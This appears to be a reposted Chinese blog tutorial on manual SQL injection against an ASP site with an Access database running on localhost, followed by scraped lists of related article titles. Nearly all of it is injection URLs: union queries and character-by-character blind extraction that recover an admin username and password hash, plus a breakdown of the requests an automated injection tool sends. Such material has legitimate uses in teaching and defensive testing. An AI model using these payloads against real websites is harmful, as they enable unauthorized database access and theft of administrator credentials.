asp+access注入数据库 (access数据库没有数据库名)
表名  字段(列名)记录(行,内容)注入常用函数:
top n 表示查询结果的第n个记录
len() 函数返回文本字段中值的长度
mid(column_name,start[,length])函数用于从文本字段中提取指定长度的字符
asc() 返回指定文本字符的ASCII码
ORDER BY 语句用于根据指定的列对结果集进行排序。默认按照升序对记录进行排序,降序使用 DESC 关键字。order by admin DESC一、asp+access 手工注入联合查询法
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 22
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 23
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
admin  a48e190fafc257d3   //and 1=2 UNION ALL SELECT 1,2,3,..... form admin 这种方法也用于先报错再获取可显示位
http二、asp+access 手工逐字猜解法
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(admin) from admin)=5 //admin
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 (d)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 (m)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 (i)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 (n)http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16  //a48e190fafc257d3
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,2,1)) from admin)=52 (4)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,3,1)) from admin)=56 (8)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,4,1)) from admin)=101 (e)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,5,1)) from admin)=49 (1)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,6,1)) from admin)=57 (9)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,7,1)) from admin)=48 (0)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,8,1)) from admin)=102 (f)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,9,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,10,1)) from admin)=102 (f)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,11,1)) from admin)=99 (c)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,12,1)) from admin)=50 (2)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,13,1)) from admin)=53 (5)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,14,1)) from admin)=55 (7)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,15,1)) from admin)=100 (d)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,16,1)) from admin)=51 (3)三、明小子注入工具抓包分析 asp+access逐字猜解法 抓包工具:SRSniffer,WSockExpert
1.检测是否是注入点:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from sysobjects)
2.猜是否存在指定表名:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from user)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from menbers)
3.猜指定表是否存在指定列名(也叫字段):
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select username from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select admin from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
3.猜admin表第一个字段有几行记录(2行记录表示两个用户):
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)<=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=2
4.猜第一行记录长度://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=4
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=6
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)=5
5.猜解第一个用户admin字段一位字符,对比ASCII值:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select top 1 admin from admin where instr(admin,'admin')=1 and len(username)=5)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 100 and 100
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 109 and 109
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 105 and 105
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 110 and 110
6.猜解password字段长度、每一位字符:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([password])) From (Select Top 1 * From [admin] Where 1=1 Order by [password]) T Order by [password] desc)=16http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 52 and 52
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 56 and 56
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),4,1)) from (Select Top 2 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 101 and 101
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 49 and 49
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),6,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 57 and 57
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),7,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 48 and 48
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),8,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),9,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),10,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),11,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 99 and 99
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),12,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 50 and 50
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),13,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 53 and 53
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),14,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 55 and 55
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),15,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 100 and 100
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),16,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 51 and 51

  

附:

转载于:https://www.cnblogs.com/i-honey/p/7900556.html

WEB安全 asp+access注入相关推荐

  1. ASP+ACCESS注入—主要靠猜实现

    ASP+ACCESS注入-主要靠猜实现 一. 环境平台  实验平台 小旋风ASPWeb服务器  目标网站 南方数据2.0  虚拟机:Win s03-1(靶机) wins03-2(攻击 ) 环境设 ...

  2. SQL注入系列之环境搭建(一)----ASP+ACCESS注入环境搭建

    一.常见网站搭建组合 操作系统:windows linux 搭建平台:iis apache uginx tomcat 脚本格式:asp php aspx jsp cgi war py pl do js ...

  3. ASP+MSSQL注入工具 web版 beta 3 final release

    ASP+MSSQL注入工具 web版 beta 3 final release 2007-10-01 12:17:14 标签:ASP web MSSQL [推送到技术圈] 文章作者:MIKA[EST] ...

  4. asp毕业设计——基于asp+access的web人事管理系统设计与实现(毕业论文+程序源码)——人事管理系统

    基于asp+access的web人事管理系统设计与实现(毕业论文+程序源码) 大家好,今天给大家介绍基于asp+access的web人事管理系统设计与实现,文章末尾附有本毕业设计的论文和源码下载地址哦 ...

  5. Web安全之SQL注入总结

    本文会介绍POST注入.Head注入.报错注入.盲注.cookie注入.宽字节注入.堆叠注入.偏移注入.DNS注入.Access.Mssql.Oracle注入原理和手法. 联合注入:https://b ...

  6. Web安全Day1 - SQL注入实战攻防

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 http ...

  7. 发现WinSRV2003SP1并没有包含ASP+Access的BUG更新

    看了Windows Server 2003 SP1的LIST后,发现解决Win2003上运行ASP+Access的BUG补丁没有包含在里面.很郁闷,真的很郁闷!苦苦等待的关键性更新却没有包含,看来微软 ...

  8. ASP+Access中文乱码的解决方法,ASP中文乱码,asp乱码问题

    确保编码声明正确(例:时尚淘女之家http://www.tao36524.com) 如果您使用的是国外空间,默认是西欧而不是GB2312,你可以通过强制为GD2312的方式! 在数据提取页面的第一行代 ...

  9. asp access的安全:不要认为简单的改后缀mdb为asp就能防下载

    asp access的安全:不要认为简单的改后缀mdb为asp就能防下载 昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里.然后在IE中输入 ...

  10. 使用Spring.Net对Web页面进行依赖注入

    今天看到这篇文章 Unity&WebForm(1): 自定义IHttpHandlerFactory使用Unity对ASP.NET Webform页面进行依赖注入,这是一个很好的思路,自定义IH ...

最新文章

  1. Windows下命令行及Java+Tesseract-OCR对图像进行(字母+数字+中文)识别,亲测可行
  2. centos ipsec tunnel 配置
  3. 绝了!“修仙模式”学编程是什么体验?
  4. ajax数据传送中文乱码,springmvc 发送ajax出现中文乱码的解决方法汇总
  5. Source file
  6. Python基础之:Python中的IO
  7. [转]docker入门(利用docker部署web应用)
  8. 平面坐标(方里网)转换为经纬度坐标
  9. python项目管理器 宝塔面板 django 404_宝塔面板成功部署Django项目流程(图文)
  10. java se好用吗_利用 Java SE 7 更好地管理资源
  11. android 拦截外拨电话,Android拦截外拨电话程序示例
  12. Cortex-M3异常中断及向量表定义
  13. linux 审计oracle,开启和关闭oracle数据库中的审计功能
  14. unity平行光太亮?物体发白?可能你使用了2个或多个平行光
  15. java 变量与常量_java的变量和常量
  16. 安全运维 - Windows系统维护
  17. MRTK 当进入某个物体时调用的函数
  18. 管壁式换热器cad图纸_一文详解换热器技术问答,真的都是珍藏版!
  19. 极狐+华为,小鹏+大疆,极氪+mobileye,自动驾驶成为“风向标”
  20. java将doc转换成pdf_Java 将Word文档转换为PDF

热门文章

  1. Linux串口驱动(5) - read详解
  2. Win1909+vs2019+Windows 10 WDK 2004(10.0.19041.1) + Windows 10 SDK 2004(10.0.19041.1)环境搭建
  3. ESP-Tuning Tool 使用手册
  4. 黑客防线、黑客X档案专辑 NPM、PYPI、DockerHub 备份
  5. 生产环境 JDK6 升级 JDK8
  6. Android平板软件推荐,Android平板电脑必备软件推荐
  7. 2018年腾讯笔试题(今年更难了)
  8. 超实用的桌面收纳盒!
  9. AI模型的大一统!多模态领域乱杀的十二边形战士
  10. Extjs中EditorGridPanel修改并获取数据的两种方式